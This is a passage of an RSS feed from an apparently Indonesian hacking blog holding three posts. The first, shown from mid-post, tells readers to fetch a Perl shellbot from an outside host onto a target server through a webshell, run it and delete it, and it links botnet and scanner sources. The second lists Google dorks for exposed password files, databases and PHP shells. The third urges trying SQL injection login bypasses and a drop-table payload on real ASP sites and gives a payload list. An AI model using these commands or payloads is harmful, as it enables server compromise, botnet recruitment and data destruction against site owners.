chibot.txt&lt;/span&gt;;&lt;span style="color:#00ffff;"&gt;ls -la&lt;/span&gt;&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt; &lt;p&gt;kalau download sourcenya tidak bisa menggunakan wget, dapat juga dengan menggunakan :&lt;br /&gt;lwp-download&lt;br /&gt;curl&lt;br /&gt;fetch&lt;br /&gt;GET&lt;/p&gt; &lt;p&gt;untuk contohnya penggunaannya dengan cara :&lt;/p&gt; &lt;p&gt;lwp-download http://henca.prohosts.org/chibot.txt&lt;br /&gt;curl -o botperl.txt http://henca.prohosts.org/chibot.txt atau curl -o http://henca.prohosts.org/chibot.txt&lt;br /&gt;&lt;em&gt;penggunaan pilihan -o untuk membuat nama file baru dengan nama botperl.txt&lt;/em&gt;&lt;br /&gt;fetch http://henca.prohosts.org/chibot.txt&lt;br /&gt;GET http://henca.prohosts.org/chibot.txt&lt;/p&gt; &lt;p&gt;untuk jelasnya dari cara diatas kalau satu-satu gini neh, cara di bawah ini sama dengan yang ada di atas. :&lt;/p&gt; &lt;p&gt;&lt;strong&gt;&lt;em&gt;wget &lt;/em&gt;&lt;/strong&gt;&lt;em&gt;&lt;strong&gt;&lt;span style="color:#00ff00;"&gt;http://henca.prohosts.org/chibot.txt&lt;/span&gt;&lt;/strong&gt;&lt;/em&gt; [enter]&lt;br /&gt;&lt;em&gt;&lt;strong&gt;&lt;span style="color:#0000ff;"&gt;chmod 755 perl chibot.txt&lt;/span&gt;&lt;/strong&gt;&lt;/em&gt; [enter]&lt;br /&gt;&lt;em&gt;&lt;strong&gt;&lt;span style="color:#ffff00;"&gt;perl chibot.txt&lt;/span&gt;&lt;/strong&gt;&lt;/em&gt; [enter]&lt;br /&gt;&lt;em&gt;&lt;strong&gt;&lt;span style="color:#ff00ff;"&gt;rm -rf chibot.txt&lt;/span&gt;&lt;/strong&gt;&lt;/em&gt; [enter]&lt;br /&gt;&lt;em&gt;&lt;strong&gt;&lt;span style="color:#00ffff;"&gt;ls -la&lt;/span&gt;&lt;/strong&gt;&lt;/em&gt; [enter]&lt;/p&gt; &lt;p&gt;penjelasannya :&lt;/p&gt; &lt;p&gt;&lt;strong&gt;&lt;em&gt;wget &lt;/em&gt;&lt;/strong&gt;&lt;em&gt;&lt;strong&gt;&lt;span style="color:#00ff00;"&gt;http://henca.prohosts.org/chibot.txt&lt;/span&gt;&lt;/strong&gt;&lt;/em&gt; [enter] &lt;– memasukkan sourcenya kedalam komputer/situs target&lt;br /&gt;&lt;em&gt;&lt;strong&gt;&lt;span style="color:#0000ff;"&gt;chmod 755 perl chibot.txt&lt;/span&gt;&lt;/strong&gt;&lt;/em&gt; [enter] &lt;— memberikan permision execute peda file chibot.txt, boleh juga nggak&lt;br /&gt;&lt;em&gt;&lt;strong&gt;&lt;span style="color:#ffff00;"&gt;perl chibot.txt&lt;/span&gt;&lt;/strong&gt;&lt;/em&gt; [enter] &lt;– menjalankan file bot dengan perintah perl karena itu file perl boleh juga ekstensinya *.pl&lt;br /&gt;&lt;em&gt;&lt;strong&gt;&lt;span style="color:#ff00ff;"&gt;rm -rf chibot.txt&lt;/span&gt;&lt;/strong&gt;&lt;/em&gt; [enter] &lt;– menghapus file chibot.txt&lt;br /&gt;&lt;em&gt;&lt;strong&gt;&lt;span style="color:#00ffff;"&gt;ls -la&lt;/span&gt;&lt;/strong&gt;&lt;/em&gt; [enter] &lt;– melihat file&lt;/p&gt; &lt;p&gt;kalau mau menjalankan botperl yang khususnya, menggunakan webshell, harus di tempat yang permnya 777, supaya lebih leluasa wgetnya.&lt;br /&gt;atau kita juga bisa pindah direktory ke /tmp atau dengan mengetikan cd yang di ikuti dengan perm 777 misalnya cd /tmp karena biasanya direktory /tmp permnya 777, tapi nggak semua server loh gitu, tergantung kalau emang kita beruntung. &lt;img src="http://samada.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /&gt; &lt;/p&gt; &lt;p&gt;kalau ada yang kurang ntar saya tambah, kayaknya neh tulisan belum sempurna…&lt;br /&gt;namanya juga belajar khan.&lt;/p&gt; &lt;p&gt;oh iya nehh source botscannya ama botperl dan juga botnet.&lt;br /&gt;&lt;a href="http://scan.prohosts.org/main.txt" target="_blank"&gt;http://scan.prohosts.org/main.txt&lt;/a&gt; &lt;– Botscan yang baru&lt;br /&gt;&lt;a href="http://henca.prohosts.org/chibot.txt" target="_blank"&gt;http://henca.prohosts.org/chibot.txt&lt;/a&gt; &lt;– yang ini scanner shellbot&lt;br /&gt;&lt;a href="http://henca.prohosts.org/netdo.txt" target="_blank"&gt;http://henca.prohosts.org/netdo.txt&lt;/a&gt; &lt;– yang ini botnet&lt;br /&gt;&lt;a href="http://henca.prohosts.org/scan9.txt" target="_blank"&gt;http://henca.prohosts.org/scan9.txt&lt;/a&gt; &lt;— yang ini punya botscan morgan v9&lt;br /&gt;&lt;a href="http://scan.prohosts.org/botscan.txt" target="_blank"&gt;http://scan.prohosts.org/botscan.txt&lt;/a&gt; &lt;– yang ini botscan tapi versi lama&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-6983934390130315216?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2007/11/buat-bot-perl-dan-botscan.html</link><author>noreply@blogger.com (gresikblog)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-5187448064061330855</guid><pubDate>Sat, 03 Nov 2007 02:02:00 +0000</pubDate><atom:updated>2007-11-02T19:07:24.323-07:00</atom:updated><title>Google Hacking Tutorial</title><description>&lt;p class="snap_preview"&gt;—————————————————&lt;br /&gt;Penulis tidak bertanggung jawab atas akibat atau dampak yang disebabkan oleh&lt;br /&gt;penggunaan materi dari tutorial ini. Tujuan penulis hanya ingin menyampaikan&lt;br /&gt;materi kepada pihak-pihak yang bertanggung jawab dan “Want to learn”, tidak&lt;br /&gt;kepada pihak-pihak yang ingin merugikan orang lain.&lt;/p&gt; &lt;p&gt;&lt;span id="more-55"&gt;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;—————————-[ Google Hacking ]—————————-&lt;/p&gt; &lt;p&gt;Banyak sekali website yang berguguran dengan memanfaatkan pencarian pada&lt;br /&gt;Google untuk menemukan targetnya. Seperti Worm Santy yang melakukan&lt;br /&gt;defacing secara massal dengan memanfaatkan Google. Dalam hitungan hari&lt;br /&gt;ribuan website tampilan utamanya berubah.&lt;/p&gt; &lt;p&gt;Tulisan ini dibuat untuk memahami bagaimana melakukan pencarian yang baik&lt;br /&gt;dengan menggunakan Google. Pada bagian akhir juga terdapat trik-trik dan&lt;br /&gt;keyword yang sering digunakan untuk melakukan pencarian file dan juga&lt;br /&gt;bagaimana mencari target dengan memanfaatkan Google.&lt;/p&gt; &lt;p&gt;— Penggunaan Dasar ———————————————–&lt;/p&gt; &lt;p&gt;- Google tidak “case sensitive”.&lt;br /&gt;Keyword: linux = LINUX = LiNuX&lt;br /&gt;Akan menghasilkan hal yang sama&lt;/p&gt; &lt;p&gt;- AND: Secara Default Google menggunakan keyword and.&lt;br /&gt;Keyword: menjadi hacker&lt;br /&gt;Hasilnya pencarian akan mengandung kata “menjadi” dan “hacker”&lt;/p&gt; &lt;p&gt;- OR: Digunakan untuk menemukan halaman yang setidaknya berisi salah&lt;br /&gt;satu dari keyword. Note: OR dituliskan dengan huruf besar semua.&lt;br /&gt;Keyword: hacker OR c**c*er&lt;br /&gt;Hasilnya pencarian akan mengandung kata “hacker” atau “c**c*er”&lt;/p&gt; &lt;p&gt;- +: Google akan mengabaikan pencarian dengan kata-kata umum seperti&lt;br /&gt;“how” dan “where”. Jika kata-kata umum ini begitu penting, anda&lt;br /&gt;bisa menambahkan “+” didepan keyword tersebut.&lt;br /&gt;Keyword: hacker how ==&gt; Kata “how” akan diabaikan&lt;br /&gt;Keyword: hacker +how ==&gt; Kata “how” akan diikutsertakan&lt;/p&gt; &lt;p&gt;- -: Tanda minus “-” bisa digunakan untuk mengecualikan kata-kata&lt;br /&gt;tertentu dalam pencarian. Misal kita ingin mencari kata&lt;br /&gt;“linus tanpa linux”, kita bisa menggunakan “linus -linux”&lt;/p&gt; &lt;p&gt;- *: Google tidak mendukung pencarian * sebagai pengganti huruf.&lt;br /&gt;Misalkan kita ingin mencari dengan kata depan menja*&lt;br /&gt;Google tidak mencari kata “menjamu”, “menjadi”, “menjalar”, dll&lt;br /&gt;Google akan menghasilkan pencarian hanya yang mengandung kata&lt;br /&gt;“menja”.&lt;/p&gt; &lt;p&gt;Tetapi google mendukung penggunaan * dalam pencarian kalimat.&lt;br /&gt;Keyword: “menjadi * hacker”&lt;br /&gt;Hasilnya pencarian dapat menghasilkan “menjadi seorang hacker”,&lt;br /&gt;“menjadi white hacker”, dll.&lt;/p&gt; &lt;p&gt;- “”: Dapat digunakan untuk mencari kata yg lengkap.&lt;br /&gt;Keyword: “menjadi hacker”&lt;br /&gt;Hasilnya pencarian akan mengandung kata “menjadi hacker”&lt;/p&gt; &lt;p&gt;- ?: Dapat digunakan untuk mencari pada direktori Google&lt;br /&gt;Keyword: ?intitle:index.of? mp3&lt;/p&gt; &lt;p&gt;— Operator Spesial ———————————————–&lt;/p&gt; &lt;p&gt;– Contoh hasil pencarian –&lt;/p&gt; &lt;p&gt;Google –&gt; Judul&lt;br /&gt;… Language Tools. Ways to help with tsunami relief ’&lt;br /&gt;Advertising Programs - About Google ©2005 Google - &gt; Deskripsi&lt;br /&gt;Searching 8,058,044,651 web pages. /&lt;br /&gt;www.google.com/ - 3k - 5 Jan 2005 –&gt; URL&lt;/p&gt; &lt;p&gt;– Contoh hasil pencarian –&lt;/p&gt; &lt;p&gt;- intitle: Untuk mencari kata-kata dari judul suatu halaman web.&lt;br /&gt;Keyword: intitle:Admin Administrasi&lt;br /&gt;Keyword tersebut akan mencari judul halaman “Admin” dengan&lt;br /&gt;deskripsi “Administrasi”&lt;/p&gt; &lt;p&gt;- allintitle: Untuk mencari kata-kata dari judul halaman web&lt;br /&gt;secara lengkap.&lt;br /&gt;Keyword: allintitle:Admin Administrasi&lt;br /&gt;Keyword tersebut akan mencari judul halaman yang mengandung&lt;br /&gt;kata “Admin” dan “Administrasi”&lt;/p&gt; &lt;p&gt;- inurl: Digunakan untuk mencari semua URL yang berisi kata-kata&lt;br /&gt;tertentu.&lt;br /&gt;Keyword: inurl:Admin Administrasi&lt;br /&gt;Keyword tersebut akan mencari URL yang mengandung kata “Admin”&lt;br /&gt;dengan deskripsi “Administrasi”&lt;/p&gt; &lt;p&gt;- allinurl: Digunakan untuk mencari semua URL yang berisi kata-kata&lt;br /&gt;tertentu.&lt;br /&gt;Keyword: allinurl:Admin Administrasi&lt;br /&gt;Keyword tersebut akan mencari URL yang mengandung kata “Admin”&lt;br /&gt;dan “Administrasi”&lt;/p&gt; &lt;p&gt;- site: Untuk mencari dalam suatu situs tertentu saja&lt;br /&gt;Keyword: site:echo.or.id&lt;br /&gt;Semua pencarian hanya berdasarkan site “echo.or.id”&lt;/p&gt; &lt;p&gt;- cache: Ketika Googlebot mengindeks suatu situs, google akan&lt;br /&gt;mengambil snapshot dari semua halaman yang telah terindeks.&lt;br /&gt;Operator ini membantu melihat halaman-halaman yang telah&lt;br /&gt;dicache.&lt;br /&gt;Keyword: cache:echo.or.id&lt;br /&gt;Misalkan site aslinya sudah tidak aktif, anda tetap dapat melihatnya&lt;br /&gt;pada snapshot/cache yang disimpan oleh Google.&lt;/p&gt; &lt;p&gt;- define: Operator ini digunakan untuk mencari definisi dari frasa&lt;br /&gt;tertentu. Semua kata yang diketik setelah operator ini akan&lt;br /&gt;diperlakukan sebagai satu frasa.&lt;br /&gt;Keyword: define:hacker&lt;/p&gt; &lt;p&gt;- filetype: Jika kita mencari jenis file tertentu yang berisi informasi&lt;br /&gt;yang anda inginkan kita bisa menggunakan operator ini.&lt;br /&gt;Keyword: “hacker” filetype:pdf&lt;br /&gt;Sampai tulisan ini dibuat google support tipe file&lt;br /&gt;# Adobe Portable Document Format (pdf)&lt;br /&gt;# Adobe PostScript (ps)&lt;br /&gt;# Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)&lt;br /&gt;# Lotus WordPro (lwp)&lt;br /&gt;# MacWrite (mw)&lt;br /&gt;# Microsoft Excel (xls)&lt;br /&gt;# Microsoft PowerPoint (ppt)&lt;br /&gt;# Microsoft Word (doc)&lt;br /&gt;# Microsoft Works (wks, wps, wdb)&lt;br /&gt;# Microsoft Write (wri)&lt;br /&gt;# Rich Text Format (rtf)&lt;br /&gt;# Shockwave Flash (swf)&lt;br /&gt;# Text (ans, txt)&lt;br /&gt;Ref: http://www.google.com/help/faq_filetypes.html&lt;/p&gt; &lt;p&gt;- link: Untuk mencari tahu berapa banyak link ke suatu situs, kita bisa&lt;br /&gt;menggunakan operator link.&lt;br /&gt;Keyword: link:www.google.com&lt;/p&gt; &lt;p&gt;- related: Untuk mencari halaman yang isinya mirip dengan URL tertentu.&lt;br /&gt;Keyword: related:www.google.com&lt;/p&gt; &lt;p&gt;— Manipulasi URL Google ——————————————&lt;/p&gt; &lt;p&gt;&gt; And bisa mengganti interface google dengan mengganti variabel hl&lt;br /&gt;(default google hl=en =&gt; bahasa inggris)&lt;br /&gt;Misalkan kita mengubah interface-nya menjadi bahasa Indonesia.&lt;br /&gt;Ex:&lt;br /&gt;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;q=site%3Aboleh-hacking.com&amp;amp;btnG=Search&lt;br /&gt;Hasil modifikasi URL&lt;br /&gt;http://www.google.com/search?hl=id&amp;amp;lr=&amp;amp;q=site%3Aboleh-hacking.com&amp;amp;btnG=Search&lt;/p&gt; &lt;p&gt;&gt; Anda dapat mengganti hasil pencarian hanya pada bahasa tertentu. Hal ini&lt;br /&gt;dilakukan dengan modifikasi variabel lr.&lt;br /&gt;(default google lr=lang_en =&gt; bahasa inggris)&lt;br /&gt;Misalkan kita hasil pencarian hanya bahasa Indonesia.&lt;br /&gt;Ex:&lt;br /&gt;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;q=site%3Aboleh-hacking.com&amp;amp;btnG=Search&lt;br /&gt;Hasil modifikasi URL&lt;br /&gt;http://www.google.com/search?hl=en&amp;amp;lr=lang_id&amp;amp;q=site%3Aboleh-hacking.com&amp;amp;btnG=Search&lt;/p&gt; &lt;p&gt;&gt; Secara default google akan menampilkan 10 site perhalaman. Anda dapat&lt;br /&gt;mengubahnya secara langsung melalui URL-nya, dengan menambahkan variabel&lt;br /&gt;num pada URL &lt;img src="http://benbego.files.wordpress.com/2007/10/icon-bi.gif" alt="D" class="wp-smiley" border="0" /&gt;&lt;br /&gt;Penggunaan num antara 1-100&lt;br /&gt;Ex:&lt;br /&gt;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;q=site%3Aboleh-hacking.com&amp;amp;btnG=Search&lt;br /&gt;Hasil modifikasi URL&lt;br /&gt;http://www.google.com/search?num=100&amp;amp;hl=en&amp;amp;lr=&amp;amp;q=site%3Aboleh-hacking.com&amp;amp;btnG=Search&lt;/p&gt; &lt;p&gt;&gt; as_qdr=mx: merupakan variabel lainnya yang dapat digunakan. Variabel ini&lt;br /&gt;digunakan menentukan hasil berdasarkan bulan. x antara 1-12&lt;br /&gt;Ex:&lt;br /&gt;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;q=site%3Aboleh-hacking.com&amp;amp;btnG=Search&lt;br /&gt;Hasil modifikasi URL&lt;br /&gt;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;as_qdr=m1&amp;amp;q=site%3Aboleh-hacking.com&amp;amp;btnG=Search&lt;/p&gt; &lt;p&gt;&gt; safe=off: arti dari variabel ini filter “SafeSearch” dimatikan. “SafeSearch”&lt;br /&gt;untuk memfilter hasil pencarian sexual.&lt;/p&gt; &lt;p&gt;Dengan pengetahuan di atas anda dapat membuat sendiri form Google di komputer&lt;br /&gt;sendiri. Sehingga tidak perlu lagi mengunjungi http://www.google.com terlebih&lt;br /&gt;dahulu (kecuali anda menggunakan brwoser yang support google secara built-in&lt;br /&gt;atau menggunakan Google Toolbar). Dengan melakukan ini kita bisa menghemat&lt;br /&gt;bandwidth ke luar negeri &lt;img src="http://benbego.files.wordpress.com/2007/10/icon-bi.gif" alt="D" class="wp-smiley" border="0" /&gt;&lt;br /&gt;Karena bandwidth di Indonesia mahal ……..&lt;/p&gt; &lt;p&gt;Contoh script google.html lengkap dengan varabielnya.&lt;/p&gt; &lt;p&gt;— BOF google.html —&lt;/p&gt; &lt;p&gt;&lt;form action="”http://www.google.com/search”" name="f"&gt;&lt;br /&gt;Variabel num: &lt;input name="num" value="10"&gt;&lt;br /&gt;&lt;br /&gt;Variabel hl: &lt;input name="hl" value="en"&gt;&lt;br /&gt;&lt;br /&gt;Variabel lr: &lt;input name="lr" value="lang_id"&gt;&lt;br /&gt;&lt;br /&gt;Variabel as_qdr: &lt;input name="as_qdr" value="m12"&gt;&lt;br /&gt;&lt;br /&gt;Variabel safe: &lt;input name="safe" value="off"&gt;&lt;br /&gt;&lt;br /&gt;&lt;input maxlength="256" size="55" name="q" value="””"&gt;&lt;br /&gt;&lt;br /&gt;&lt;input type="submit" value="”Google" name="btnG"&gt;&lt;br /&gt;&lt;/form&gt;&lt;/p&gt; &lt;p&gt;— EOF google.html —&lt;/p&gt; &lt;p&gt;Anda tinggal menghilangkan Variabel yang tidak anda inginkan atau&lt;br /&gt;menambahkan apapun disana. Semuanya terserah kepada anda &lt;img src="http://benbego.files.wordpress.com/2007/10/icon-bi.gif" alt="D" class="wp-smiley" border="0" /&gt;&lt;br /&gt;Berikut merupakan script default pencarian google.&lt;/p&gt; &lt;p&gt;— BOF google.html —&lt;/p&gt; &lt;p&gt;&lt;form action="”http://www.google.com/search”" name="f"&gt;&lt;br /&gt;&lt;input maxlength="256" size="55" name="q" value="””"&gt;&lt;br /&gt;&lt;br /&gt;&lt;input type="submit" value="”Google" name="btnG"&gt;&lt;br /&gt;&lt;/form&gt;&lt;/p&gt; &lt;p&gt;— EOF google.html —&lt;/p&gt; &lt;p&gt;Google masih terus dikembangkan. Untuk melihat apa yang sedang&lt;br /&gt;dikembangkan Google. Anda bisa ke http://labs.google.com&lt;/p&gt; &lt;p&gt;— Tips &amp;amp; Tricks ————————————————–&lt;/p&gt; &lt;p&gt;Dari dasar-dasar dan spesial operator tersebut anda bisa mencampurkan&lt;br /&gt;operator-operator tersebut.&lt;/p&gt; &lt;p&gt;Ex:&lt;br /&gt;- Keyword: site:boleh-hacking.com, menghasilkan semua site echo.or.id. Kemudian&lt;br /&gt;anda bisa mencoba keyword: site:boleh-hacking.com hacker, akan menghasilkan&lt;br /&gt;semua site boleh-hacking.com yang mengandung kata hacker.&lt;/p&gt; &lt;p&gt;Kita juga dapat melakukan pencarian secara spesifik melalui google.&lt;br /&gt;Untuk melakukannya anda dapat ke site berikut:&lt;br /&gt;- http://www.google.com/bsd&lt;br /&gt;- http://www.google.com/mac&lt;br /&gt;- http://www.google.com/linux&lt;br /&gt;- http://www.google.com/microsoft&lt;br /&gt;- http://www.google.com/univ/education&lt;/p&gt; &lt;p&gt;Berbagai trik keyword pada Google:&lt;br /&gt;parent directory books -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;parent directory /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;parent directory DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;parent directory video -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;parent directory Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;parent directory MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;/p&gt; &lt;p&gt;intitle:index of intitle:mp3 -html -htm name size&lt;br /&gt;intitle:index of intitle:video -html -htm name size&lt;br /&gt;intitle:index of intitle:cgi-bin passwd -html -htm name size&lt;br /&gt;intitle:index of intitle:cgi-bin password -html -htm name size&lt;/p&gt; &lt;p&gt;inurl:”admin.mdb” -html&lt;br /&gt;inurl:”password.mdb” -html&lt;br /&gt;inurl:”data.mdb” -html&lt;br /&gt;“phpMyAdmin” “running on” inurl:”main.php”&lt;br /&gt;intitle:”PHP Shell” “Enable stderr” php&lt;/p&gt; &lt;p&gt;Masih banyak lagi keyword yang bisa ditemukan disini [5] &lt;img src="http://benbego.files.wordpress.com/2007/10/icon-bi.gif" alt="D" class="wp-smiley" border="0" /&gt;&lt;/p&gt; &lt;p&gt;— Referensi ——————————————————&lt;/p&gt; &lt;p&gt;[1] http://www.google.com/help/basics.html&lt;br /&gt;[2] http://www.google.com/help/features.html&lt;br /&gt;[3] http://www.google.com/help/refinesearch.html&lt;br /&gt;[4] http://www.google.com/help/interpret.html&lt;br /&gt;[5] http://johnny.ihackstuff.com/&lt;br /&gt;[6] O’Reilly - Google Hacks&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-5187448064061330855?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2007/11/google-hacking-tutorial.html</link><author>noreply@blogger.com (gresikblog)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-457790318831890410</guid><pubDate>Sat, 03 Nov 2007 00:19:00 +0000</pubDate><atom:updated>2007-11-04T17:20:08.733-08:00</atom:updated><title>DASAR-DASAR SQL INJECTION 1</title><description>&lt;div style="text-align: justify;"&gt;&lt;pre&gt;                            *-----------------------------------------------------------*&lt;br /&gt;                   |              DASAR-DASAR SQL INJECTION 1                  |&lt;br /&gt;                   *-----------------------------------------------------------*&lt;br /&gt;      *      by : the_day  ;the_day@echo.or.id      *&lt;br /&gt;                          |   Greetz to echo staf : y3dips,moby,comex;SARAH    |&lt;br /&gt;                          *                          *&lt;br /&gt;                          *-----------------------------------------------------------*&lt;br /&gt;&lt;br /&gt;Sebelum membahas tentang sql injection pertama-tama saya akan menerangkan apa itu sql injection dan&lt;br /&gt;kenapa bisa terjadi.&lt;br /&gt;Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke 'query'&lt;br /&gt;dengan cara manipulasi data input ke applikasi tsb.&lt;br /&gt;Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan MySql ,&lt;br /&gt;disini gw cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5 dan&lt;br /&gt;beberapa sql injection pada url.&lt;br /&gt;Biasa Sql Injection dilakukan pada login page pada asp seperti di :&lt;br /&gt;admin\login.asp&lt;br /&gt;login.asp&lt;br /&gt;Jadi yang akan menjadi target itu page tersebut ,&lt;br /&gt;sekarang kita mulai aja dengan dasar-dasar sql injection :d.&lt;br /&gt;Biasanya di sql statment&lt;br /&gt;select id, user_name, password from user&lt;br /&gt;maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.&lt;br /&gt;Bisanya pada login page dengan mengunakan statment result setnya sebagai berikut :&lt;br /&gt;select id, user_name,password from user where name = 'echo' and password='password'&lt;br /&gt;Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browser&lt;br /&gt;Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL atau "Structured Query Language"&lt;br /&gt;seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.&lt;br /&gt;Nah, ga tau kenapa karakter single quote 'breaks out'&lt;br /&gt;dari delimiter nya SQL  Jadi kalau misal ada inputan&lt;br /&gt;User: echo';drop table user--&lt;br /&gt;dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya :D&lt;br /&gt;oh iya '--' merukapan mark nya MSSQL, jadi perintah selanjutnya ga di execute.&lt;br /&gt;Sekarang untuk lebih jelasnya kita secara langsung pada login script seperti&lt;br /&gt;input login + password. Nama field nya 'login' dan 'pass'. dan&lt;br /&gt;SQL nya di asp: var sql = select * from users where username='"+login+"' and password='"+pass"'";&lt;br /&gt;coba kalau ada inputan: login: ';drop table users-- pass: chfn (*wink* negative)&lt;br /&gt;pasti ke drop tuh table users&lt;br /&gt;Aduh pada pusing ya , gini deh cara gampangnya adn kita lupakan yang diatas :P kita langsung praktek aja&gt;&lt;br /&gt;Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari login.asp atau&lt;br /&gt;admin\login.asp.&lt;br /&gt;Kalau udah dapet masukin nich variable sql nya&lt;br /&gt;user:admin&lt;br /&gt;pass:' or 1=1--&lt;br /&gt;Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d&lt;br /&gt;atau :&lt;br /&gt;user:' or 1=1--&lt;br /&gt;admin:' or 1=1--&lt;br /&gt;Mas , ga bisa nich gimana ya ?&lt;br /&gt;Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisa&lt;br /&gt;buat sendiri script dan tes karena gw udah coba buat sendiri dan berhasil tanpa melakukan paket filter&lt;br /&gt;pada db nya . Untuk test apakah suatu page mempunyai vulnerable , gini caranya :&lt;br /&gt;Kalian pernh melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :&lt;br /&gt;http://vivtim/index.asp?id=10&lt;br /&gt;Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit tambahan&lt;br /&gt;pada addressnya seperti memasukan : test'1=1--&lt;br /&gt;menjadi http://victim/index.asp?id=test'1=1--&lt;br /&gt;Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page target&lt;br /&gt;lalu kita tamhankan hidden field pada source tersebut sebagai contoh :&lt;br /&gt;&lt;form action="http://victim/admin/login.asp" method="post"&gt;&lt;br /&gt;&lt;input name="A" value="test' or 1=1--" type="hidden"&gt;&lt;br /&gt;&lt;/form&gt;&lt;br /&gt;Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username.&lt;br /&gt;ingat script ini ditamhakna pd script yg sudah kalian download dr target .&lt;br /&gt;  &lt;br /&gt;   Variable ' or 1=1--&lt;br /&gt;Mungkin pada bertanya-tanya kenapa mengunakan variable 'or 1=1-- dan sangat penting.Lihat contoh&lt;br /&gt;pada sebuah web tertulis http://victim/index.asp?category=laptop&lt;br /&gt;Dalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb .&lt;br /&gt;Kalau ditulis dalam script ASP maka akan menjadi :&lt;br /&gt;v_cat = request("category")&lt;br /&gt;sqlstr="SELECT * FROM product WHERE PCategory='" &amp;amp; v_cat &amp;amp; "'"&lt;br /&gt;set rs=conn.execute(sqlstr)&lt;br /&gt;Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pd sql statment menjadi&lt;br /&gt;SELECT * FROM product WHERE PCategory='laptop'&lt;br /&gt;lalu apa hub dengan 'or 1=1---&lt;br /&gt;coba kalau kita ganti http://victim/index.asp?category=laptop menjadi&lt;br /&gt;http://victim/index.asp?category=laptop'or 1=1--&lt;br /&gt;Kita lihat varible v_cat sekarang menjadi laptop'or 1=1-- lalu dalam SQL query nya menjadi&lt;br /&gt;SELECT * FROM product WHERE PCategory='laptop' or 1=1--'&lt;br /&gt;artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong) yang menyebabkan&lt;br /&gt;Sql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkan&lt;br /&gt;kita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda -- merupakan&lt;br /&gt;mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login page&lt;br /&gt;Kita bisa masuk kedalam login page tanpa password dan user name :d.&lt;br /&gt;Kemungkinan-kemungkinan variable lainya :&lt;br /&gt;or 1=1--&lt;br /&gt;" or 1=1--&lt;br /&gt;or 1=1--&lt;br /&gt;' or 'a'='a&lt;br /&gt;" or "a"="a&lt;br /&gt;') or ('a'='a&lt;br /&gt;' or 0=0 --&lt;br /&gt;" or 0=0 --&lt;br /&gt;or 0=0 --&lt;br /&gt;' or 0=0 #&lt;br /&gt;" or 0=0 #&lt;br /&gt;or 0=0 #&lt;br /&gt;' or 'x'='x&lt;br /&gt;" or "x"="x&lt;br /&gt;') or ('x'='x&lt;br /&gt;' or 1=1--&lt;br /&gt;" or 1=1--&lt;br /&gt;or 1=1--&lt;br /&gt;' or a=a--&lt;br /&gt;" or "a"="a&lt;br /&gt;') or ('a'='a&lt;br /&gt;") or ("a"="a&lt;br /&gt;hi" or "a"="a&lt;br /&gt;hi" or 1=1 --&lt;br /&gt;hi' or 1=1 --&lt;br /&gt;hi' or 'a'='a&lt;br /&gt;hi') or ('a'='a&lt;br /&gt;hi") or ("a"="a&lt;br /&gt;&lt;br /&gt;Selain masuk kedalam page tersebut kita juga bisa memanfaatkannya untuk remote execution dengan sql Injection&lt;br /&gt;dan untuk artikel akan dimasukan dalam ezine 3 echo.or.id .Semoga artikel ini berguna .&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------&lt;br /&gt;Sumber Bacca : http://securityfocus.com/articles/SQLinjectionBasicTutorial.php&lt;br /&gt;       http://www.securiteam.com/securityreviews&lt;br /&gt;              &lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-457790318831890410?l=gresikblog.blogspot.com' alt='' 